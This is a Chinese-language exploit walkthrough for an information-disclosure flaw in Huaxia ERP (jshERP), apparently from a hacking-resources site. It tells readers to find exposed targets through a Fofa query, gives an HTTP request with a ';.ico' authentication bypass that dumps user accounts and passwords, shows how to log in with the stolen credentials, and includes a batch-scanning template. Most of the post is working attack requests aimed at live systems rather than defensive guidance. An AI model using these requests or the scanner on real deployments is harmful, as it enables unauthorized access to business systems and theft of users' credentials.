信息描述
华夏ERP是一种企业资源规划(ERP)软件,旨在为企业提供全面的信息管理和集成解决方案,以提高效率、降低成本并优化业务流程。该软件可以帮助企业管理各种业务功能,例如财务、销售、采购、库存、生产计划等。它还具有报告和分析功能,使企业能够更好地了解其业务运营情况。华夏ERP通常用于中小型企业。华夏ERP前台泄露了某api接口,恶意攻击者可通过调用该接口,对用户的账号和密码进行非授权访问。
漏洞复现
步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....
#Fofa搜索语法
"jshERP-boot"
步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求头内容....在响应包中可以看到json格式的用户名密码。
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: */*
Referer: http://1.12.225.89/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
步骤三:抓取登录数据包,替换用户名密码即可登入系统。
POST /jshERP-boot/user/login HTTP/1.1
Host: yourip
Content-Length: 68
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin:
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"loginName":"loginname","password":"password"}
批量脚本
id: huaxiaERP-information-leakage
info:
name: huaxiaERP-information-leakage
author:xingyun
severity: medium
description: 华夏ERP信息泄露
requests:
method: GET
path:
"{{BaseURL}}/jshERP-boot/user/getAllList;.ico"
and :
matchers:
type: status
status:
200
type: word
words:
"username"
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...